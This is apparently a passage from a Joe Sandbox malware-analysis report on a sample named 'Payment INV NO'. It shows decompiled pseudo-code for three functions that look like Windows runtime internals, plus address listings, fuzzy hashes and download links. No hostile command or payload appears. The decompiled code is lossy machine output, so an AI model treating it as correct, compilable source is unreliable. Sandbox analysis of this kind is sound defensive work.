                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bbd817fbc680bc43396ac62ee21aea020157c918f97ff80b10c6f1562896d793
                                                          • Instruction ID: 64089926d4c2726a9394473230c50bc16e59429a6dcec4aa2930ed200cc756d7
                                                          • Opcode Fuzzy Hash: bbd817fbc680bc43396ac62ee21aea020157c918f97ff80b10c6f1562896d793
                                                          • Instruction Fuzzy Hash: AD51E271B016068FEB36DF6CC854B6AF7B6BB44B20F04467EE946CB691DB30D9018B80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179E8B0 Relevance: .2, Instructions: 190COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0179E8B0(void* __ecx, signed int* _a4, signed int _a8) {
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t123;
				signed int _t131;
				signed int* _t134;

				_t134 = _a4;
				_t131 = 0;
				if(_t134 == 0) {
					L70:
					_t131 = 0xc000000d;
					L15:
					return _t131;
				}
				_t123 = _a8;
				if(_t123 == 0) {
					goto L70;
				}
				if((_t123 & 0x00000400) != 0) {
					_t123 = 0xfff;
				}
				if((_t123 & 0x00000001) != 0) {
					if(_t134[5] != _t131) {
						if(( *_t134 & 0x00000001) != 0) {
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[5]);
						}
						_t134[5] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffffe;
				}
				if((_t123 & 0x00000002) != 0) {
					if(_t134[6] != _t131) {
						if(( *_t134 & 0x00000002) != 0) {
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[6]);
						}
						_t134[6] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffffd;
				}
				if((_t123 & 0x00000004) != 0) {
					if(_t134[7] != _t131) {
						if(( *_t134 & 0x00000004) != 0) {
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[7]);
						}
						_t134[7] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffffb;
				}
				if((_t123 & 0x00000008) != 0) {
					if(_t134[8] != _t131) {
						if(( *_t134 & 0x00000008) != 0) {
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[8]);
						}
						_t134[8] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffff7;
				}
				if((_t123 & 0x00000010) != 0) {
					_t97 = _t134[9];
					if(_t97 != 0) {
						if(( *_t134 & 0x00000010) != 0) {
							 *(_t97 + 0x20) =  *(_t97 + 0x20) & 0xffffffbf;
							E017A76E2(_t134[9]);
						}
						_t134[9] = _t131;
					}
					 *_t134 =  *_t134 & 0xffffffef;
				}
				if((_t123 & 0x00000020) != 0) {
					_t98 = _t134[0xa];
					if(_t98 != 0) {
						if(( *_t134 & 0x00000020) != 0) {
							 *(_t98 + 0x20) =  *(_t98 + 0x20) & 0xffffffbf;
							E017A76E2(_t134[0xa]);
						}
						_t134[0xa] = _t131;
					}
					 *_t134 =  *_t134 & 0xffffffdf;
				}
				if((_t123 & 0x00000040) != 0) {
					_t99 = _t134[0xd];
					if(_t99 != 0) {
						if(( *_t134 & 0x00000040) != 0) {
							 *(_t99 + 0x20) =  *(_t99 + 0x20) & 0xffffffbf;
							E017A76E2(_t134[0xd]);
						}
						_t134[0xd] = _t131;
					}
					 *_t134 =  *_t134 & 0xffffffbf;
				}
				if(_t123 < 0) {
					_t100 = _t134[0xc];
					if(_t100 != 0) {
						if(( *_t134 & 0x00000080) != 0) {
							 *(_t100 + 0x20) =  *(_t100 + 0x20) & 0xffffffbf;
							E017A76E2(_t134[0xc]);
						}
						_t134[0xc] = _t131;
					}
					 *_t134 =  *_t134 & 0xffffff7f;
				}
				_t125 = 0x200;
				if((0x00000200 & _t123) != 0) {
					_t101 = _t134[0xe];
					if(_t101 != 0) {
						if(( *_t134 & 0x00000200) != 0) {
							 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0xffffffbf;
							_t125 = _t134[0xe];
							E017A76E2(_t134[0xe]);
						}
						_t134[0xe] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffffdff;
				}
				if((0x00000800 & _t123) != 0) {
					if(_t134[0x14] != _t131) {
						if(( *_t134 & 0x00000800) != 0) {
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[0x14]);
						}
						_t134[0x14] = _t131;
					}
					 *_t134 =  *_t134 & 0xfffff7ff;
				}
				if((_t123 & 0x00000fff) != 0 && _t134[0xf] != _t131) {
					E0179E8B0(_t125, _t134[0xf], _t123);
					if(_t134[0xf] != _t131) {
						E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t131, _t134[0xf]);
					}
					_t134[0xf] = _t131;
				}
			}











                                                          0x0179e8bb
                                                          0x0179e8bf
                                                          0x0179e8c3
                                                          0x017f57a2
                                                          0x017f57a2
                                                          0x0179e942
                                                          0x0179e94a
                                                          0x0179e94a
                                                          0x0179e8c9
                                                          0x0179e8ce
                                                          0x00000000
                                                          0x00000000
                                                          0x0179e8da
                                                          0x017f564f
                                                          0x017f564f
                                                          0x0179e8e3
                                                          0x0179e98f
                                                          0x017f565c
                                                          0x017f566b
                                                          0x017f566b
                                                          0x017f5670
                                                          0x017f5670
                                                          0x0179e995
                                                          0x0179e995
                                                          0x0179e8ec
                                                          0x0179e9a0
                                                          0x017f567b
                                                          0x017f568a
                                                          0x017f568a
                                                          0x017f568f
                                                          0x017f568f
                                                          0x0179e9a6
                                                          0x0179e9a6
                                                          0x0179e8f5
                                                          0x0179e950
                                                          0x017f569a
                                                          0x017f56a9
                                                          0x017f56a9
                                                          0x017f56ae
                                                          0x017f56ae
                                                          0x0179e956
                                                          0x0179e956
                                                          0x0179e8fa
                                                          0x0179e95e
                                                          0x017f56b9
                                                          0x017f56c8
                                                          0x017f56c8
                                                          0x017f56cd
                                                          0x017f56cd
                                                          0x0179e964
                                                          0x0179e964
                                                          0x0179e8ff
                                                          0x0179e969
                                                          0x0179e96e
                                                          0x017f56d8
                                                          0x017f56da
                                                          0x017f56e1
                                                          0x017f56e1
                                                          0x017f56e6
                                                          0x017f56e6
                                                          0x0179e974
                                                          0x0179e974
                                                          0x0179e904
                                                          0x0179e979
                                                          0x0179e97e
                                                          0x017f56f1
                                                          0x017f56f3
                                                          0x017f56fa
                                                          0x017f56fa
                                                          0x017f56ff
                                                          0x017f56ff
                                                          0x0179e984
                                                          0x0179e984
                                                          0x0179e909
                                                          0x0179e9ae
                                                          0x0179e9b3
                                                          0x017f570a
                                                          0x017f570c
                                                          0x017f5713
                                                          0x017f5713
                                                          0x017f5718
                                                          0x017f5718
                                                          0x0179e9b9
                                                          0x0179e9b9
                                                          0x0179e911
                                                          0x0179e9c1
                                                          0x0179e9c6
                                                          0x017f5723
                                                          0x017f5725
                                                          0x017f572c
                                                          0x017f572c
                                                          0x017f5731
                                                          0x017f5731
                                                          0x0179e9cc
                                                          0x0179e9cc
                                                          0x0179e917
                                                          0x0179e91e
                                                          0x0179e9d7
                                                          0x0179e9dc
                                                          0x017f573b
                                                          0x017f573d
                                                          0x017f5741
                                                          0x017f5744
                                                          0x017f5744
                                                          0x017f5749
                                                          0x017f5749
                                                          0x0179e9e2
                                                          0x0179e9e2
                                                          0x0179e92b
                                                          0x017f5754
                                                          0x017f5758
                                                          0x017f5767
                                                          0x017f5767
                                                          0x017f576c
                                                          0x017f576c
                                                          0x017f576f
                                                          0x017f576f
                                                          0x0179e937
                                                          0x017f577e
                                                          0x017f5786
                                                          0x017f5795
                                                          0x017f5795
                                                          0x017f579a
                                                          0x017f579a

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a8df61879a1cdc1f9895abfc1f929f93a44cd0d2dbde015532df3ec0a3442989
                                                          • Instruction ID: 1b68721203a9e255d99c878abbe6d792735938f8b986cd6e229ead48454674d7
                                                          • Opcode Fuzzy Hash: a8df61879a1cdc1f9895abfc1f929f93a44cd0d2dbde015532df3ec0a3442989
                                                          • Instruction Fuzzy Hash: CD715971544B42CFDB729E19DA44B22FBE1BF90771F140B6DDAD206AE2DB30A444CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017A7E41 Relevance: .2, Instructions: 174COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 98%
                                                          			E017A7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E017ACEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0179C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1885780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							L01815510(0x177e2f4, 0x363, 0x177e360, 0, 0x177e328, _t125 + 0x24);
							_t102 =  *0x1885780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E017B7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E017B7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									L01817016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E017B7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E017B7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									L01817016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E017CA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0179B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                          0x017a7e4c
                                                          0x017a7e50
                                                          0x017a7e55
                                                          0x017a7e58
                                                          0x017a7e5d
                                                          0x017a7e71
                                                          0x017a7f33
                                                          0x017a7e77
                                                          0x017a7e77
                                                          0x017a7e79
                                                          0x017a7e79
                                                          0x017a7e7e
                                                          0x017a7f45
                                                          0x017f9848
                                                          0x00000000
                                                          0x017f9848
                                                          0x017a7f4e
                                                          0x017a7f53
                                                          0x017a7f5a
                                                          0x00000000
                                                          0x00000000
                                                          0x017f985a
                                                          0x017f9862
                                                          0x017f9866
                                                          0x00000000
                                                          0x017f986c
                                                          0x00000000
                                                          0x017f986c
                                                          0x017a7e84
                                                          0x017a7e84
                                                          0x017a7e8d
                                                          0x017f9871
                                                          0x017a7eb8
                                                          0x017a7ec0
                                                          0x017a7ec0
                                                          0x017a7e9a
                                                          0x017f987e
                                                          0x00000000
                                                          0x00000000
                                                          0x017f9884
                                                          0x017f988b
                                                          0x017f98a7
                                                          0x017f98ac
                                                          0x017f98b1
                                                          0x017f98b6
                                                          0x017f98b8
                                                          0x017f98b8
                                                          0x017f98b9
                                                          0x00000000
                                                          0x017f98b9
                                                          0x017a7ea0
                                                          0x017a7ea7
                                                          0x00000000
                                                          0x00000000
                                                          0x017a7eac
                                                          0x017a7eb1
                                                          0x017a7ec6
                                                          0x017a7ed0
                                                          0x017f98cc
                                                          0x017a7ed6
                                                          0x017a7ed6
                                                          0x017a7ed6
                                                          0x017a7ede
                                                          0x017a7ee3
                                                          0x017f98e3
                                                          0x017f98f0
                                                          0x017f9902
                                                          0x017f98f2
                                                          0x017f98fb
                                                          0x017f98fb
                                                          0x017f9907
                                                          0x017f991d
                                                          0x017f991d
                                                          0x017f9907
                                                          0x017f98e3
                                                          0x017a7ef0
                                                          0x017a7f14
                                                          0x017a7f14
                                                          0x017a7f1e
                                                          0x017f9946
                                                          0x017a7f24
                                                          0x017a7f24
                                                          0x017a7f24
                                                          0x017a7f2c
                                                          0x017f996a
                                                          0x017f9975
                                                          0x017f9975
                                                          0x017f997e
                                                          0x017f9993
                                                          0x017f9993
                                                          0x017f997e
                                                          0x00000000
                                                          0x017a7ef2
                                                          0x017a7efc
                                                          0x017a7f0a
                                                          0x017a7f0e
                                                          0x017f9933
                                                          0x00000000
                                                          0x017f9933
                                                          0x00000000
                                                          0x017a7f0e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017a7eb1

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 17fe706151a44184aebffc1d1b17065a3dc7715ab3e5fa76ec167e1ac2adf3ff
                                                          • Instruction ID: bbd4929c296765ac36558543e42dcf3c8d8eb341234123442163b209dcd84281
                                                          • Opcode Fuzzy Hash: 17fe706151a44184aebffc1d1b17065a3dc7715ab3e5fa76ec167e1ac2adf3ff
                                                          • Instruction Fuzzy Hash: 2351E231608785DBEB29CB6CC984B6AFBE4AB84314F840799EB519B3D1D731ED00CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179395E Relevance: .2, Instructions: 172COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 83%
                                                          			E0179395E(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t54;
				intOrPtr _t57;
				intOrPtr _t67;
				intOrPtr _t74;
				void* _t77;
				intOrPtr* _t81;
				signed int _t93;
				void* _t94;
				intOrPtr* _t97;
				intOrPtr* _t104;
				intOrPtr _t109;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				void* _t123;

				_v8 =  *0x188d360 ^ _t114;
				_t54 =  *0x18884cc; // 0x0
				_v16 = __edx;
				_t93 = 0;
				_t112 = __ecx;
				_v12 = _v12 & 0;
				E017BFAD0(_t54 + 4);
				_t109 =  *0x18884cc; // 0x0
				_t110 = _t109 + 8;
				_t97 =  *_t110;
				while(_t97 != _t110) {
					_t113 = _t97 - 0x1c;
					_t67 =  *((intOrPtr*)(_t112 + 0xc));
					if( *((intOrPtr*)(_t113 + 0x10)) !=  *((intOrPtr*)(_t112 + 8)) ||  *((intOrPtr*)(_t113 + 0x14)) != _t67 ||  *((intOrPtr*)(_t113 + 8)) !=  *_t112) {
						L21:
						_t97 =  *_t97;
						continue;
					} else {
						_t69 =  *((intOrPtr*)(_t113 + 0xc));
						if( *((intOrPtr*)(_t113 + 0xc)) !=  *((intOrPtr*)(_t112 + 4))) {
							goto L21;
						}
						_t13 = _t113 + 0x28; // 0x24
						_t94 = _t13;
						E017B2280(_t69, _t94);
						if( *(_t113 + 0x5c) == 2) {
							__eflags = _v16;
							if(_v16 == 0) {
								E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *(_t113 + 0x58));
								 *(_t113 + 0x58) =  *(_t113 + 0x58) & 0x00000000;
								 *(_t113 + 0x5c) =  *(_t113 + 0x5c) & 0x00000000;
								L8:
								asm("lock inc dword [esi+0x50]");
								 *(_t113 + 0x5c) = 1;
								E017AFFB0(_t94, _t112, _t94);
								_t74 =  *0x18884cc; // 0x0
								_t123 = _t74 + 4;
								E017BFA00(_t94, _t97, _t112, _t74 + 4);
								while(1) {
									_t95 = 0;
									_t77 = E01793ACA(0, _t112, _t113, _t112, _t113, _t123, 0);
									_t124 = _t77 - 0xc000022d;
									if(_t77 == 0xc000022d) {
										_t95 = 0xc000022d;
									}
									_t110 = _t113;
									if(E01793ACA(_t95, _t112, _t113, _t112, _t113, _t124, 1) == 0xc000022d) {
										_t93 = 0xc000022d;
									}
									_t17 = _t113 + 0x28; // 0x24
									E017B2280(_t17, _t17);
									_v12 = _v12 + 1;
									_t20 = _t113 + 0x2c; // 0x28
									_t104 = _t20;
									_t81 =  *_t104;
									while(_t81 != _t104) {
										 *(_t81 + 0x60) =  *(_t81 + 0x60) & 0x00000000;
										_t81 =  *_t81;
									}
									if( *(_t113 + 0x58) != 0) {
										_t112 =  *(_t113 + 0x58);
										_t44 = _t113 + 0x28; // 0x24
										 *(_t113 + 0x58) =  *(_t113 + 0x58) & 0x00000000;
										E017AFFB0(_t93, _t112, _t44);
										continue;
									}
									if(_t93 != 0) {
										__eflags = _t93 - 0xc000022d;
										if(_t93 == 0xc000022d) {
											 *(_t113 + 0x58) = _t112;
											 *(_t113 + 0x5c) = 2;
											L01822DA1(_t113);
										}
										L17:
										_t27 = _t113 + 0x28; // 0x24
										E017AFFB0(_t93, _t112, _t27);
										E017CDE9E(_t113);
										L18:
										if(_v12 > 1) {
											_t113 = 0;
											_push(0);
											_push(0);
											_push(_t93);
											_push( *((intOrPtr*)(_t112 + 0x18)));
											_push(_t112);
											_push(_t112 + 8);
											E017DA3A0();
											__eflags = _t93;
											if(_t93 == 0) {
												E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t112);
											}
											_t93 = 0x80;
										}
										return E017DB640(_t93, _t93, _v8 ^ _t114, _t110, _t112, _t113);
									}
									 *(_t113 + 0x5c) =  *(_t113 + 0x5c) & _t93;
									if( *((intOrPtr*)(_t113 + 0x18)) != _t93) {
										__eflags =  *((intOrPtr*)(_t112 + 0x10)) -  *((intOrPtr*)(_t113 + 0x18));
										if( *((intOrPtr*)(_t112 + 0x10)) -  *((intOrPtr*)(_t113 + 0x18)) > 0) {
											goto L16;
										}
										goto L17;
									}
									L16:
									 *((intOrPtr*)(_t113 + 0x18)) =  *((intOrPtr*)(_t112 + 0x10));
									goto L17;
								}
							}
							_push(_t94);
							L27:
							E017AFFB0(_t94, _t112);
							_t93 = 0x80;
							break;
						}
						if( *(_t113 + 0x5c) == 1) {
							__eflags = _v16;
							_push(_t94);
							if(_v16 != 0) {
								goto L27;
							}
							 *(_t113 + 0x58) = _t112;
							E017AFFB0(_t94, _t112);
							_t93 = 0x103;
							break;
						}
						goto L8;
					}
				}
				_t57 =  *0x18884cc; // 0x0
				E017BFA00(_t93, _t97, _t112, _t57 + 4);
				goto L18;
			}

























                                                          0x0179396d
                                                          0x01793970
                                                          0x0179397b
                                                          0x0179397e
                                                          0x01793980
                                                          0x01793982
                                                          0x01793986
                                                          0x0179398b
                                                          0x01793991
                                                          0x01793994
                                                          0x01793996
                                                          0x017939a1
                                                          0x017939a7
                                                          0x017939aa
                                                          0x01793aa7
                                                          0x01793aa7
                                                          0x00000000
                                                          0x017939c4
                                                          0x017939c4
                                                          0x017939ca
                                                          0x00000000
                                                          0x00000000
                                                          0x017939d0
                                                          0x017939d0
                                                          0x017939d4
                                                          0x017939dd
                                                          0x017efffc
                                                          0x017f0000
                                                          0x017f0020
                                                          0x017f0025
                                                          0x017f0029
                                                          0x017939ed
                                                          0x017939ed
                                                          0x017939f2
                                                          0x017939f9
                                                          0x017939fe
                                                          0x01793a03
                                                          0x01793a07
                                                          0x01793a0c
                                                          0x01793a0c
                                                          0x01793a13
                                                          0x01793a1d
                                                          0x01793a1f
                                                          0x017f004b
                                                          0x017f004b
                                                          0x01793a27
                                                          0x01793a37
                                                          0x017f0052
                                                          0x017f0052
                                                          0x01793a3d
                                                          0x01793a41
                                                          0x01793a46
                                                          0x01793a49
                                                          0x01793a49
                                                          0x01793a4c
                                                          0x01793a4e
                                                          0x01793a9f
                                                          0x01793aa3
                                                          0x01793aa3
                                                          0x01793a56
                                                          0x017f0059
                                                          0x017f005c
                                                          0x017f005f
                                                          0x017f0064
                                                          0x00000000
                                                          0x017f0064
                                                          0x01793a5e
                                                          0x017f0073
                                                          0x017f0075
                                                          0x017f007d
                                                          0x017f0080
                                                          0x017f0087
                                                          0x017f0087
                                                          0x01793a72
                                                          0x01793a72
                                                          0x01793a76
                                                          0x01793a7d
                                                          0x01793a82
                                                          0x01793a86
                                                          0x017f0091
                                                          0x017f0096
                                                          0x017f0097
                                                          0x017f0098
                                                          0x017f0099
                                                          0x017f009c
                                                          0x017f009d
                                                          0x017f009e
                                                          0x017f00a3
                                                          0x017f00a5
                                                          0x017f00b2
                                                          0x017f00b2
                                                          0x017f00b7
                                                          0x017f00b7
                                                          0x01793a9e
                                                          0x01793a9e
                                                          0x01793a64
                                                          0x01793a6a
                                                          0x01793ac4
                                                          0x01793ac6
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01793ac8
